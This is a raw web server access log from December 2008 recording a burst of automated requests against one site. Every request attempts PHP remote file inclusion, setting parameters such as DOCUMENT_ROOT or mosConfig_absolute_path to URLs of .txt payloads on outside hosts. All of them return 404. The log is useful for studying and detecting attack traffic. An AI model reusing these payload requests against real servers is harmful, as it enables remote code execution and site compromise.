201.236.88.58 - - [08/Dec/2008:08:23:52 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://baaaaaa.altervista.org/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.91.201 - - [08/Dec/2008:08:23:54 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.samilglass.com/images/bajoid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.232.91.201 - - [08/Dec/2008:08:23:54 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.samilglass.com/images/bajoid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.35.84.90 - - [08/Dec/2008:08:24:29 -0800] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.35.84.90 - - [08/Dec/2008:08:24:29 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.35.84.90 - - [08/Dec/2008:08:24:29 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.90.214.218 - - [08/Dec/2008:08:24:46 -0800] "GET /logs/access_080427.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://90plan.ovh.net/~riemai/mambots/search/scr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.35.84.90 - - [08/Dec/2008:08:24:54 -0800] "GET /logs/access_081107.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.21.71.133 - - [08/Dec/2008:08:24:59 -0800] "GET /logs/access_080412.log/index.php?sourcedir=http://www.novoftp.xpg.com.br/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.43.212.94 - - [08/Dec/2008:08:25:11 -0800] "GET /logs/access_080207.log/db.php?commonpath=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.94 - - [08/Dec/2008:08:25:11 -0800] "GET /logs/access_080714.log/db.php?commonpath=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.94 - - [08/Dec/2008:08:25:11 -0800] "GET /db.php?commonpath=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.94 - - [08/Dec/2008:08:25:11 -0800] "GET /logs/db.php?commonpath=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
